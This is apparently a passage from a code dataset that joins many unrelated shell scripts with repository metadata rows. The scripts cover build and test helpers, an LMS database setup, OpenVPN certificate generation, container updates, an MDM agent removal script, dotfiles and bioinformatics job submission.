${MINGW_PREFIX}/bin/python -m pytest
}
package() {
cd "${srcdir}/python-build-${MSYSTEM}"
MSYS2_ARG_CONV_EXCL="--prefix=" \
${MINGW_PREFIX}/bin/python -m installer --prefix=${MINGW_PREFIX} \
--destdir="${pkgdir}" dist/*.whl
install -Dm644 LICENSE "${pkgdir}${MINGW_PREFIX}/share/licenses/python-${_realname}/LICENSE"
}
| true |
88c11c21b745af6a2aa428d1febd6bbd8e7f002c | Shell | itsguysmiley/vpl-samples | /vpl_evaluate.sh | UTF-8 | 2,060 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# Default evaluate script for VPL
# @Copyright 2014 Juan Carlos Rodríguez-del-Pino
# @License http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
# @Author Juan Carlos Rodríguez-del-Pino <jcrodriguez@dis.ulpgc.es>
#load VPL environment vars
. common_script.sh
if [ "$SECONDS" = "" ] ; then
export SECONDS=20
fi
if [ "$VPL_GRADEMIN" = "" ] ; then
export VPL_GRADEMIN=0
export VPL_GRADEMAX=10
fi
#exist run script?
if [ ! -s vpl_run.sh ] ; then
echo "I'm sorry, but I haven't a default action to evaluate the type of submitted files"
else
#avoid conflict with C++ compilation
mv vpl_evaluate.cpp vpl_evaluate.cpp.save
#Prepare run
./vpl_run.sh >>vpl_compilation_error.txt 2>&1
cat vpl_compilation_error.txt
if [ -f vpl_execution ] ; then
mv vpl_execution vpl_test
if [ -f vpl_evaluate.cases ] ; then
mv vpl_evaluate.cases evaluate.cases
else
echo "Error need file 'vpl_evaluate.cases' to make an evaluation"
exit 1
fi
#Add constants to vpl_evaluate.cpp
echo "const float VPL_GRADEMIN=$VPL_GRADEMIN;" >vpl_evaluate.cpp
echo "const float VPL_GRADEMAX=$VPL_GRADEMAX;" >>vpl_evaluate.cpp
let VPL_MAXTIME=VPL_MAXTIME-$SECONDS-1;
echo "const int VPL_MAXTIME=$VPL_MAXTIME;" >>vpl_evaluate.cpp
cat vpl_evaluate.cpp.save >> vpl_evaluate.cpp
check_program g++
g++ vpl_evaluate.cpp -g -lm -lutil -o .vpl_tester
if [ ! -f .vpl_tester ] ; then
echo "Error compiling evaluation program"
else
echo "#!/bin/bash" >> vpl_execution
echo "./.vpl_tester" >> vpl_execution
fi
else
echo "#!/bin/bash" >> vpl_execution
echo "echo" >> vpl_execution
echo "echo '<|--'" >> vpl_execution
echo "echo '-$VPL_COMPILATIONFAILED'" >> vpl_execution
if [ -f vpl_wexecution ] ; then
echo "echo '======================'" >> vpl_execution
echo "echo 'It seems you are trying to test a program with a graphic user interface'" >> vpl_execution
fi
echo "echo '--|>'" >> vpl_execution
echo "echo" >> vpl_execution
echo "echo 'Grade :=>>$VPL_GRADEMIN'" >> vpl_execution
fi
chmod +x vpl_execution
fi | true |
56706b3e7543fa6977fea98aebd31f2761535236 | Shell | duncanmichel/Programming-Problem-Solutions | /HackerRank/Bash/misc.sh | UTF-8 | 851 | 4.125 | 4 | [] | no_license | #!/bin/bash
BEGINCOMMENT
Your task is to use for loops to display only odd natural numbers from 1 to 99.
ENDCOMMENT
for i in {1..99..2}
do
echo $i
done
BEGINCOMMENT
Four lines containing the sum (), difference (), product (), and quotient (), respectively.
ENDCOMMENT
read num1
read num2
echo `expr $num1 + $num2`
echo `expr $num1 - $num2`
echo `expr $num1 \* $num2`
echo `expr $num1 / $num2`
BEGINCOMMENT
Given two integers, X and Y, identify whether X>Y or X<Y or X=Y.
Exactly one of the following lines:
- X is less than Y
- X is greater than Y
- X is equal to Y
ENDCOMMENT
read num1
read num2
if [ $num1 -gt $num2 ]; then #VERY sensitive to spacing in the conditional
echo "X is greater than Y"
elif [ $num1 -lt $num2 ]; then
echo "X is less than Y"
elif [ $num1 -eq $num2 ]; then
echo "X is equal to Y"
fi
| true |
0a76043f11204cffd4ecfd4f79f8396d09a63048 | Shell | stefan-langenmaier/lxc-gentoo-build-tools | /update-gentoo-base-container.sh | UTF-8 | 946 | 2.921875 | 3 | [] | no_license | #!/bin/bash
set -eux
CONTAINER_NAME=$1
#CONTAINER_NAME=gentoo-base-container
#CONTAINER_NAME=cubox-i
mountpoint -q /mnt/full-root/ || mount /mnt/full-root/ #|| die "Failed mounting full root"
mkdir -p /var/lib/lxc/${CONTAINER_NAME}
mountpoint -q /var/lib/lxc/${CONTAINER_NAME} || mount -o subvol=vols/${CONTAINER_NAME} /dev/mmcblk1p3 /var/lib/lxc/${CONTAINER_NAME}
# install world
lxc-start -n ${CONTAINER_NAME}
if [[ $# -gt 1 && "$2" == "interactive" ]] ; then
lxc-attach -n ${CONTAINER_NAME}
else
# copy configs from template
[[ -d template/${CONTAINER_NAME} ]] && cp -a template/${CONTAINER_NAME}/* /var/lib/lxc/${CONTAINER_NAME}
lxc-attach -n ${CONTAINER_NAME} -- eselect news read
lxc-attach -n ${CONTAINER_NAME} -- emerge -uDN world --with-bdeps=y --backtrack=200
lxc-attach -n ${CONTAINER_NAME} -- etc-update -p # do trivial merges
lxc-attach -n ${CONTAINER_NAME} -- rm /var/tmp/portage/* -rf
fi
lxc-stop -n ${CONTAINER_NAME}
| true |
b71ca34d97fb87375f877daa91fc533d46219143 | Shell | nguyen-tich-duy/canvas-lms-test | /initdb.sh | UTF-8 | 1,949 | 3.765625 | 4 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/bin/bash
set -eo pipefail
IFS=$'\n\t'
# -e: immediately exit if any command has a non-zero exit status
# -o: prevents errors in a pipeline from being masked
# IFS new value is less likely to cause confusing bugs when looping arrays or arguments (e.g. $@)
BASE_PATH=$(dirname $(realpath $0))
cd $BASE_PATH
source ./.env.production
source ./.env
source scripts/common.sh
message "Update git repo"
exec_command "git submodule update --init --depth 1 canvas-lms"
message "Copy new settings"
exec_command "cp -r config/canvas-lms/* canvas-lms/config"
export DOCKER_HOST_IP=$(ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+')
function database_exists {
docker-compose run --rm web \
bundle exec rails runner 'ActiveRecord::Base.connection' &> /dev/null
}
function create_db {
if ! docker-compose run --no-deps --rm web touch db/structure.sql; then
message \
"The 'docker' user is not allowed to write to db/structure.sql. We need write
permissions so we can run migrations."
touch db/structure.sql
confirm_command 'chmod a+rw db/structure.sql' || true
fi
if database_exists; then
message \
'An existing database was found.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
This script will destroy ALL EXISTING DATA if it continues
If you want to migrate the existing database, use migrate.sh
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
message 'About to run "bundle exec rake db:drop"'
prompt "type NUKE in all caps: " nuked
[[ ${nuked:-n} == 'NUKE' ]] || exit 1
docker-compose run -e DISABLE_DATABASE_ENVIRONMENT_CHECK=$DISABLE_DATABASE_ENVIRONMENT_CHECK --rm web \
bundle exec rake db:drop
fi
message "Creating new database"
docker-compose run --rm web \
bundle exec rake db:create
docker-compose run -e CANVAS_LMS_STATS_COLLECTION=$CANVAS_LMS_STATS_COLLECTION --rm web \
bundle exec rake db:initial_setup
}
create_db
| true |
1b26ae362868977ad33884276f9e56bd119bc17c | Shell | socketpy/last-login | /userlogin.sh | UTF-8 | 1,062 | 3.453125 | 3 | [] | no_license | #!/bin/bash
#Script made logger details
#Author: Vinod.N K
#Usage: who logged in via ssh
#Distro : Linux -Centos, Rhel, and any fedora
#Check whether root user is running the script
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if rpm -q mailx &> /dev/null; then
echo "Mailx is installed..."
else
echo "Installing mailx..." && sudo yum install mailx -y
fi
if rpm -q sendmail &> /dev/null; then
echo "Sendmail is installed..."
else
echo "Installing sendmail"... && sudo yum install sendmail -y
fi
echo "restarting Sendmail..."
sudo /etc/init.d/sendmail restart
read -p "whats is tha mail id? : " mailid
echo " #last login configuration by Devops
echo \"Hello System Admin, This for your information. ALERT!!! - Check your Server. There seems to be a Root Shell Access on:\" \`date\` \`who\` | mail -s \"Alert: Root Access from \`who | cut -d\"(\" -f2 | cut -d\")\" -f1\`\" \"$mailid\" " >> /root/.bashrc
echo " userlogin script has been added to the server Thanx for Using"
| true |
30ca24da6e1dd73ef7f9080ae29ad90c5871026c | Shell | MalavVyas/i3updated | /polybar/launch.dash | UTF-8 | 406 | 2.703125 | 3 | [] | no_license | #!/bin/dash
# Terminate already running bar instances
pkill polybar
pkill polybar
sleep 2
if type "xrandr"; then
for m in $(xrandr --query | grep " connected" | cut -d" " -f1); do
MONITOR=$m polybar --reload example -r &
MONITOR=$m polybar --reload top -r &
done
else
polybar --reload example -r &
polybar --reload top -r
fi
# Launch bar1 and bar2
#polybar example -r &
#polybar top -r &
| true |
7fbd25e80002500f4b9e5618c079f982a211b52d | Shell | liu1992yang/cuby4_md_pipeline | /extract_traj/traj_process.sh | UTF-8 | 5,534 | 2.890625 | 3 | [] | no_license | #!/bin/bash
module load anaconda3_4.3.1
PYTHON_FILELIST="$1" PYTHON_INTERVAL="$2" /gscratch/sw/anaconda-4.3.1/python3/bin/python3.6 - << END
import os, subprocess, sys
import functools, itertools
FILELIST= os.environ['PYTHON_FILELIST']
INTERVAL = os.environ['PYTHON_INTERVAL']
assert FILELIST and INTERVAL,'usage: traj_process.sh filelist interval_steps'
def get_prefix(filelist):
flist = []
try:
with open(filelist) as fin:
for line in fin:
if not line.strip():
continue
flist.append(line.strip())
return flist
except OSError:
print(filelist+ 'not found!')
sys.exit(1)
def file_exist(fname):
'''
check if a path exists
'''
if not os.path.exists(fname):
print(fname + ' does not exist')
return False
return True
def format_tasklist(tasklist):
path = os.getcwd()
if not tasklist:
return #return None type if tasklist is empty
return map(lambda x : 'cd {}; cuby4 inp.yaml&>LOG'.format(os.path.join(path,x)),tasklist)
def charge_multp_temp(prefix,anneal):
#by default, if not found specified in the anneal
'''
rtype: charge: str(int)
rtype: multipl: str(int)
rtype: temp: str(int)
'''
multipl = '1'
with open(os.path.join(prefix,anneal)) as fin:
for line in fin:
curr_line = line.strip()
if line.startswith('charge'):
charge = line.split(':')[1].strip()
continue
if line.startswith('temperature'):
temp = line.split(':')[1].strip()
continue
if line.startswith('multiplicity'):
multipl = line.split(':')[1].strip()
continue
return charge, multipl, temp
def split_traj(prefix,traj,temp,interval_steps, charge, multp):
"""
interval_steps: int, others: str
"""
with open(os.path.join(prefix,traj), 'r') as fin:
counter = 1
l1 = fin.readline().strip()
assert l1, "empty 1st line"
atom_number = int(l1)
print(atom_number)
current_snap = list(itertools.islice(fin,1 , atom_number+1))
#the original 1st line has been read, so skip current 1st line
skip = (atom_number+2)*(interval_steps-1)+2
tasklist = []
while fin:
if not current_snap:
break
sub_folder = '{}_{}K_snap_{}'.format(prefix, temp, str(counter))
#(1)mkdir of new folder
subprocess.run(['mkdir',sub_folder])
#(2)save geom to prefix_temp_snap_n.xyz
write_sub(current_snap, atom_number, sub_folder)
#(3)write inp.yaml
write_yaml(sub_folder, charge, multp)
#(4)add one task to tasklist
tasklist.append(sub_folder)
counter +=1
current_snap = list(itertools.islice(fin,skip,skip+atom_number))
return tasklist
def write_sub(snap, atom_num, sub_folder):
content = map(lambda x: x.strip().split()[:4], snap)
if not file_exist(sub_folder):
print(sub_folder + 'has not been made yet')
return #return nonetype
with open(os.path.join(sub_folder, sub_folder +'.xyz'),'w') as fout:
fout.write(str(atom_num)+'\n'+'\n')
fout.write('\n'.join('\t'.join(elem for elem in line) for line in content))
def write_yaml(sub_folder, charge, multipl):
if not file_exist(sub_folder):
return
with open(os.path.join(sub_folder,'inp.yaml'),'w') as fout:
fout.write('''job: optimize
geometry: {0}
charge: {1}
multiplicity: {2}
maxcycles: 2000
print: timing
interface: mopac
mopac_precise: yes
mopac_peptide_bond_fix: yes
method: pm6
modifiers: dispersion3, h_bonds4
modifier_h_bonds4:
h_bonds4_scale_charged: no
h_bonds4_extra_scaling: {{}}
'''.format(sub_folder + '.xyz',charge, multipl))
def process_one_traj(prefix, interval_steps):
"""
interval_steps: int
"""
#check if prefix directory exist
if not file_exist(prefix):
return #nonetype
origin_flist = os.listdir(prefix)
anneal, traj = None, None #initial nonetype
for fn in origin_flist:
if fn.startswith('anneal'):
anneal = fn
if fn.startswith('trajectory'):
traj = fn
if not anneal or not traj:
print('no anneal or traj file found for {}'.format(prefix))
return
#get charge mulplicity and temperature
charge, multp, temp = charge_multp_temp(prefix, anneal)
#read traj, split up and write subfiles, return tasks for final tasks write out
return split_traj(prefix, traj, temp, interval_steps, charge, multp)
def write_sbatch(task_number):
with open('pm6_parallel.sh', 'w') as fout:
fout.write('''#!/bin/bash
#SBATCH --job-name=pm6s
#SBATCH --nodes=1
#SBATCH --time=72:00:00
#SBATCH --mem=100Gb
#SBATCH --workdir={}
#SBATCH --partition=ilahie
#SBATCH --account=ilahie
#module load parallel_sql
module load parallel-20170722
module load contrib/mopac16
source {}/.rvm/scripts/rvm
ldd /sw/contrib/cuby4/cuby4/classes/algebra/algebra_c.so > ldd.log
cat pm6_tasks | parallel -j 28
'''.format(os.getcwd(),os.environ['HOME']))
if __name__ == '__main__':
file_list = FILELIST
interval = int(INTERVAL)
prefix_list = get_prefix(file_list)
print(prefix_list)
all_tasks = list(map(functools.partial(process_one_traj, interval_steps = interval),prefix_list))
task_number = sum(len(i) for i in all_tasks if i is not None)
with open('pm6_tasks','w') as fout:
fout.write('\n'.join('\n'.join(format_tasklist(i)) for i in all_tasks if i is not None))
write_sbatch(task_number)
sys.exit()
END
if [[ $? = 0 ]]; then
echo "Please run sbatch pm6_parallel.sh for parallel pm6 optimization"
echo "change partition name and run time if needed"
echo "tasklist is stored in 'pm6_tasks'"
else
echo "failure:$?"
fi
| true |
1d8d2efcea320b31cbaba6ffcfd5001a2f1d0cbc | Shell | mattcaron/media_management | /sync_phone | UTF-8 | 422 | 2.828125 | 3 | [] | no_license | #!/bin/bash
BASEDIR=/media/matt/PHONE
PICS=$BASEDIR/DCIM/100KYCRA/
cp -a ~/.keepassx/* $BASEDIR/keepassx/.
cp -a ~/.ssh/id_* $BASEDIR/ssh/.
echo pulling pics
rsync -aLh --inplace "$PICS" "$HOME/workspace/pics/photos/new"
echo moving pics to gallery
mv "$PICS"/* "$BASEDIR/pics/."
echo done
echo Is it time to run a backup with adb?
echo If so, do it, then plug it in to the computer and run backup_phone.
echo Bye!
| true |
5902228802035473a9b918fb774520e4e763979b | Shell | pmuthubalu/my_repo_files | /remove.sh | UTF-8 | 1,208 | 3.203125 | 3 | [] | no_license | #!/bin/sh
USER=$(logname)
if [ -z "$USER" ]; then
echo "no user found"
exit 1
fi
echo "Current user is $USER"
MISR_DAEMON_PATH="/Library/LaunchDaemons/com.mobileiron.mac.misr.root.plist"
MISR_USER_DAEMON_PATH="/Users/$USER/Library/LaunchAgents/com.mobileiron.mac.misr.user.plist"
CHECKIN_AGENT_DAEMON_PATH="/Users/$USER/Library/LaunchAgents/com.mobileiron.mac.checkinAgent.plist"
echo "Remove /Library/Managed Preferences/$USER/..."
sudo rm -R "/Library/Managed Preferences/$USER/"
echo "Remove com.mobileiron.mac.agent..."
rm -R /Users/$USER/Library/Application\ Support/com.mobileiron.mac.agent/
echo "Try to unload user's daemons..."
launchctl unload $MISR_USER_DAEMON_PATH
launchctl unload $CHECKIN_AGENT_DAEMON_PATH
echo "Remove user's daemons..."
launchctl remove com.mobileiron.mac.misr.user
launchctl remove com.mobileiron.mac.checkinAgent
if [ -f "$CHECKIN_AGENT_DAEMON_PATH" ]; then
rm -f $CHECKIN_AGENT_DAEMON_PATH
fi
if [ -f "$MISR_USER_DAEMON_PATH" ]; then
rm -f $MISR_USER_DAEMON_PATH
fi
echo "Remove root's daemons..."
sudo launchctl unload $MISR_DAEMON_PATH
sudo launchctl remove com.mobileiron.mac.misr.root
if [ -f "$MISR_DAEMON_PATH" ]; then
sudo rm -f $MISR_DAEMON_PATH
fi
| true |
5560e637e4a7a26e53b7765c87724de5fc5fe5cd | Shell | alces-software/oztemplates-openstack | /bin/centos7.0.sh | UTF-8 | 2,433 | 3.109375 | 3 | [] | no_license | #!/bin/bash
################################################################################
# (c) Copyright 2007-2014 Alces Software Ltd #
# #
# Symphony Software Toolkit #
# #
# This file/package is part of Symphony #
# #
# Symphony is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# Symphony is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License #
# for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with Symphony. If not, see <http://www.gnu.org/licenses/>. #
# #
# For more information on the Symphony Toolkit, please visit: #
# http://www.alces-software.org/symphony #
# #
################################################################################
if [ -z $1 ]; then
echo "Please specify image name" >&2
exit 1
fi
export IMAGE_NAME=$1
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
if [ -z $POOL_PATH ]; then
. $DIR/../etc/vars
else
echo "Skip loading config"
fi
export OZ_CONFIG=/tmp/oz.cfg.$$
echo "Prepare.."
sed -e "s|%POOL_PATH%|$POOL_PATH|g" \
-e "s/%EXT_BRIDGE%/$EXT_BRIDGE/g" $DIR/../config/oz.cfg.template > $OZ_CONFIG
$DIR/../centos/7.0/centos7.0-minimal.sh
echo "Cleanup.."
rm $OZ_CONFIG
| true |
a4662ffb7a536faf2b04baf9bc8b253271ad2fde | Shell | swarna04/aepsdk-edge-ios | /tools/git-hooks/setup.sh | UTF-8 | 245 | 2.859375 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
# run this script to setup a git hook to run the code formatter before committing changes
GIT_HOOKS_DIR=$(dirname $0)
GIT_DIR=$(git rev-parse --git-dir)
cp $GIT_HOOKS_DIR/pre-commit $GIT_DIR/hooks
chmod +x $GIT_DIR/hooks/pre-commit
| true |
eadd0923ca9dc8abfa410001d842f8865a8e3122 | Shell | alexras/themis_tritonsort | /src/scripts/valsort/shell_scripts/run_validation_scripts.sh | UTF-8 | 450 | 4.21875 | 4 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
shopt -s failglob
if [ $# -ne 1 ]
then
echo "Usage: `basename $0` output_dir"
exit 1
fi
OUTPUT_DIR=$1
if [ ! -d $OUTPUT_DIR ]
then
echo "Output directory $OUTPUT_DIR doesn't exist."
exit 1
fi
# Run all scripts in parallel
for SCRIPT in ${OUTPUT_DIR}/*.sh
do
# Run the script but squash stdout and stderr
echo "Running $SCRIPT"
$SCRIPT >/dev/null 2>&1 &
done
# Wait for all scripts to finish.
wait
| true |
02d00c8cbc2d86c1503e90c1a027ce243e89de47 | Shell | misund/dotfiles | /.bashrc | UTF-8 | 2,623 | 3.015625 | 3 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
RED='\033[0;31m'
NOCOLOR='\033[0m' # No Color
printf "${RED}<3${NOCOLOR}\n"
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# don't overwrite GNU Midnight Commander's setting of `ignorespace'.
export HISTCONTROL=$HISTCONTROL${HISTCONTROL+,}ignoredups
# ... or force ignoredups and ignorespace
export HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# Prompt and title
if [ -f ~/.bash_prompt ]; then
. ~/.bash_prompt
fi
if [ -f ~/.bash_kubecontext ]; then
. ~/.bash_kubecontext
fi
# Define colors in less (man uses less for paging by default)
if [ -f ~/.less_colors ]; then
. ~/.less_colors
fi
# Alias definitions.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# NPM script completion, e.g. `npm run clean`
if [ -f ~/.bash_npm_completion ]; then
. ~/.bash_npm_completion
fi
# Force UTF-8 output
export LANG=en_US.UTF-8
# gief utf8
export LC_ALL=en_US.utf8
# New files should be 0755 (u=rwx, g=rx, o=rx)
umask 022
#------------------------------------------------------------
# Path
#------------------------------------------------------------
# kubectl completion, pls
command -v kubectl >/dev/null 2>&1 && { (source <(kubectl completion bash) ) }
# execute files in $HOME/bin
PATH="$HOME/bin:$PATH"
# Add Jena to Java's CLASSPATH
export CLASSPATH=$CLASSPATH:$HOME/bin/Jena-2.6.4/bin
# Add RVM to PATH for scripting
#PATH="$HOME/.gem/ruby/1.9.1/bin:$PATH"
PATH=$PATH:$HOME/.rvm/bin
# Add NVM to PATH for scripting
[[ -s $HOME/.nvm/nvm.sh ]] && . $HOME/.nvm/nvm.sh # This loads NVM
[[ -r $NVM_DIR/bash_completion ]] && . $NVM_DIR/bash_completion # Bash completion for NVM
export NODE_PATH=$NODE_PATH:$HOME/.npm/lib/node_modules # Put NPM root value in node path
export PATH=$PATH:~/.npm/bin # run node modules' executables (like grunt)
# Start tmux
[[ -z "$TMUX" ]] && exec tmux
| true |
37f76eb3b2f37b8f4f2920ced8241ba3fbf640e4 | Shell | yamamoto-febc/s3cmd-docker | /entrypoint.sh | UTF-8 | 537 | 3.453125 | 3 | [] | no_license | #!/bin/sh
set -e
#
# main entry point to run s3cmd
#
S3CMD_PATH=/opt/s3cmd/s3cmd
#
# Check for required parameters
#
if [ -z "${ACCESS_KEY}" ]; then
echo "ERROR: The environment variable ACCESS_KEY is not set."
exit 1
fi
if [ -z "${SECRET_KEY}" ]; then
echo "ERROR: The environment variable SECRET_KEY is not set."
exit 1
fi
echo "" > /.s3cfg
cat /opt/base_s3cfg >> /.s3cfg
echo "" >> /.s3cfg
echo "access_key=${ACCESS_KEY}" >> /.s3cfg
echo "secret_key=${SECRET_KEY}" >> /.s3cfg
${S3CMD_PATH} --config=/.s3cfg "$@"
| true |
14c1a10fecb2698d210f38367dbeaba98830fb46 | Shell | guardian/parking-lot | /docker-debug.sh | UTF-8 | 729 | 3.859375 | 4 | [] | no_license | #!/bin/bash
ROOT_DIR=$(cd $(dirname "$0"); pwd)
DOCKER_NAME=parking-lot:latest
# Boot docker
echo "Booting container..."
docker run -d -t -i -v $ROOT_DIR/sites:/etc/apache2/sites-enabled -p 18080:80 $DOCKER_NAME /bin/bash -c 'source /etc/apache2/envvars; /usr/sbin/apache2; /bin/bash'
if [ $? -eq 0 ]; then
sleep 2
CONTAINER_ID=$(docker ps | awk "/$DOCKER_NAME/ {print \$1}")
if [ -z $CONTAINER_ID ]; then
echo "Can't find running container"
else
# Run test scripts
echo "Attaching to container..."
docker attach $CONTAINER_ID
fi
fi
echo "Cleaning up..."
if [ ! -z $CONTAINER_ID ]; then
docker stop $CONTAINER_ID >/dev/null
docker rm -f $CONTAINER_ID >/dev/null
fi
| true |
3141091a8abbaaa1ee69ce3b088ca264e0683cac | Shell | gkanwar/ctf2020 | /infra/00_make_easyrsa_certs_and_keys.sh | UTF-8 | 1,496 | 3.203125 | 3 | [] | no_license | #!/bin/bash
### CA lives centrally on the gameserver.
### -- server.{crt,key} for gameserver
### -- teamX.{crt,key} for vulnboxes as ovpn clients to gameserver
### -- teamX_server.{crt,key} for vulnboxes as ovpn servers to members
### -- teamX_Y.{crt,key} for members as ovpn clients to vulnboxes
cd /etc/openvpn/easy-rsa
if [[ "$INIT" == "1" ]]; then # one-time init
sudo ./easyrsa init-pki
sudo ./easyrsa build-ca nopass # can add pass if you like feeling secure
fi
if [[ "$NUM_TEAMS" == "" ]]; then
echo "Must set NUM_TEAMS"
exit 1
fi
if [[ "$NUM_MEMBERS" == "" ]]; then
echo "Must set NUM_MEMBERS"
exit 1
fi
if [[ "$NOP_ID" == "" ]]; then
echo "Must set NOP_ID"
exit 1
fi
TEAMS="${NOP_ID} $(seq 1 ${NUM_TEAMS})"
# Generate requests
sudo ./easyrsa --batch --req-cn=server gen-req server nopass
for t in ${TEAMS}; do
sudo ./easyrsa --batch --req-cn=team${t} gen-req team${t} nopass
sudo ./easyrsa --batch --req-cn=team${t} gen-req team${t}_server nopass
for i in $(seq 1 ${NUM_MEMBERS}); do
sudo ./easyrsa --batch --req-cn=team${t}_${i} gen-req team${t}_${i} nopass
done
done
# Sign requests
sudo ./easyrsa --batch sign-req server server
for t in ${TEAMS}; do
sudo ./easyrsa --batch sign-req client team${t}
sudo ./easyrsa --batch sign-req server team${t}_server
for i in $(seq 1 ${NUM_MEMBERS}); do
sudo ./easyrsa --batch sign-req client team${t}_${i}
done
done
# DH params for the servers
sudo ./easyrsa --batch gen-dh
| true |
e71df7f26045dba0620f7d3e1136b18fe3b26a64 | Shell | Lfarioli/Postgres | /PostgresErcole/ercolepg.sh | UTF-8 | 1,045 | 3.328125 | 3 | [] | no_license | #!bin/bash
PSU1='/tmp/check_version.sql'
PSU2='/tmp/check_version_8.4.sql'
MPARAM='/tmp/get_param.sql'
DBPARAM1='/tmp/query_each_db.sql'
DBPARAM2='/tmp/query_each_db_8.4.sql'
SCHEMAPARAM='/tmp/take_schema.sh'
OUTPUTFILE='/tmp/final.final'
VERSION=$(psql -V |grep psql |awk '{print $3}'|cut -c1-1)
get_version () {
if [ "$VERSION" == "8" ]; then
$(psql -c "create language plpgsql;")
VERSION8=$(psql -At <$PSU2 |grep 2 )
echo "$VERSION8" >> $OUTPUTFILE
else
VERSIONMORE=$(psql -At <$PSU1 |grep NOT)
echo "$VERSIONMORE" >> $OUTPUTFILE
fi
}
memory_parameter () {
MEMP=$(psql -tx <$MPARAM)
echo "$MEMP" >> $OUTPUTFILE
}
db_parameter () {
if [ "$VERSION" == "8" ]; then
DBPARAM1=$(psql -tx <$DBPARAM2)
echo "$DBPARAM1" >> $OUTPUTFILE
else
DBPARAM2=$(psql -tx <$DBPARAM1)
echo "$DBPARAM2" >> $OUTPUTFILE
fi
}
schema_parameter () {
$( sh $SCHEMAPARAM )
$( cat final_report.txt >> $OUTPUTFILE )
}
schema_parameter
db_parameter
#get_version
memory_parameter
| true |
7c5018a174864faf46fae0f9d209b20fc3879337 | Shell | Abhishek-Prusty/Bomberman-Game-Terminal | /run.sh | UTF-8 | 448 | 3.1875 | 3 | [] | no_license | #!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
NOFCPU=$(cat /proc/cpuinfo | grep processor | wc -l)
START='/sys/devices/system/cpu/cpu'
END='/cpufreq/scaling_governor'
declare -a ORIGOVS
for ((I=0;I < NOFCPU;I++))
{
j=$START$I$END
ORIGOVS[$I]=$(cat $j)
}
for ((I=0;I < NOFCPU;I++))
{
j=$START$I$END
echo performance > $j
}
python "$DIR/bomberman.py"
for ((I=0;I < NOFCPU;I++))
{
j=$START$I$END
echo ${ORIGOVS[$I]} > $j
}
| true |
0997280da7f734c8c815b40a44966967988f6925 | Shell | ericorosel/Pi_grammer | /SPI_EEPROM_PROGRAMMING/ATMEL_PROGRAMMING/pi_eeprom_program.sh | UTF-8 | 536 | 3.0625 | 3 | [] | no_license | #!/bin/bash
echo "Programming EEPROM..."
# get firmware file name
eeprom_set=$(find /home/pi/eeprom/*.hex)
$eeprom_set .= "/home/pi/eeprom/$eeprom_set"
#CHIP
DEVICE=atmega328p
# hard toggle of reset line, necessary to see successful programming on fresh ICs
sudo gpio -g mode 26 output
sudo gpio -g write 26 0
sleep 0.1
sudo gpio -g write 26 1
sleep 0.1
#program eeprom
sudo avrdude -p $DEVICE -C /home/pi/avrdude_gpio.conf -c linuxspi -P /dev/spidev0.0 -b 1000000 -D -v -u -U eeprom:w:$eeprom_set:i 2>/home/pi/eeprom_results.txt
| true |
9004b11378db2f7020040eacb0b4e9ed2086c9ce | Shell | DanCF93/Cardo-et-al-2021 | /Sequencing_alignment/bin/4a_featurecount.sh | UTF-8 | 2,793 | 3.046875 | 3 | [] | no_license | #!/bin/bash
scriptName="4a_featurecount"
jobName="4a"
jobMemory="8G"
jobLength="05:00:00"
myDir=$(pwd)
tmp=$( echo $myDir | sed "s/.*an0\([0-9]\+\).*/\1/p" -n )
jobName=${jobName}.${tmp}
sampleNames=($(${myDir}/read_param.sh sampleNames))
sampleNumber=${#sampleNames[@]}
refGTF=$(${myDir}/read_param.sh refGTF)
project=$(${myDir}/read_param.sh arccaProject)
queue=$(${myDir}/read_param.sh arccaBatchQueue)
moduleSAMTools=$(${myDir}/read_param.sh moduleSAMTools)
moduleFeatureCounts=$(${myDir}/read_param.sh moduleFeatureCounts)
[ -d OUT/${scriptName}/ ] || mkdir OUT/${scriptName}/ ; rm -f OUT/${scriptName}/*
[ -d ERR/${scriptName}/ ] || mkdir ERR/${scriptName}/ ; rm -f ERR/${scriptName}/*
rm -f RUN/${scriptName}.sh
for sample in "${sampleNames[@]}"
do
[[ -d ${myDir}/../output/${sample}/featurecount/ ]] && rm -fr ${myDir}/../output/${sample}/featurecount/ ; mkdir -p ${myDirr}../output/${sample}/featurecount/
done
echo \#!/bin/bash > RUN/${scriptName}.sh
echo \#PBS -P ${project} >> RUN/${scriptName}.sh
echo \#PBS -q ${queue} >> RUN/${scriptName}.sh
echo \#PBS -N ${jobName} >> RUN/${scriptName}.sh
echo \#PBS -l select=1:ncpus=1:mem=${jobMemory} >> RUN/${scriptName}.sh
